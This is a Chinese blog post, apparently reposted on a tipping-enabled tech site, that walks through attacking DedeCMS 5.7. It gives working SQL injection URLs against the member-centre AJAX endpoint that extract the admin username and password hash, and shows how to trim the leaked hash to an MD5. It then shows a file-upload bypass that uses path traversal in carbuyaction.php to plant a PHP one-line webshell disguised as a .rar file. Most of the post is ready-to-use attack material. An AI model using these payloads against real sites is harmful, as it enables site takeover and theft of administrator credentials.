php 5.5.7 漏洞,织梦5.7注入加上传漏洞

会员中心查询会员信息语句过滤不严,导致url可提交注入参数;

会员中心有上传动作过滤不严,导致上传漏洞

详细说明:

①注入漏洞。

这站 https://www.webshell.cc/

首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,

然后访问

“/member/ajax_membergroup.php?action=post&membergroup=1”

页面,如图说明存在该漏洞。

然后写上语句

查看管理员帐号

https://www.webshell.cc//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`

admin www.2cto.com

查看管理员密码

https://www.webshell.cc//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@

8d29b1ef9f8c5a5af429

查看管理员密码

得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5

8d2

9b1ef9f8c5a5af42

9

cmd5没解出来 只好测试第二个方法

②上传漏洞:

只要登陆会员中心,然后访问页面链接

“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”

如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm

https://www.webshell.cc/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post"

enctype="multipart/form-data" name="form1">

file:

newname:

提交

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3520.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值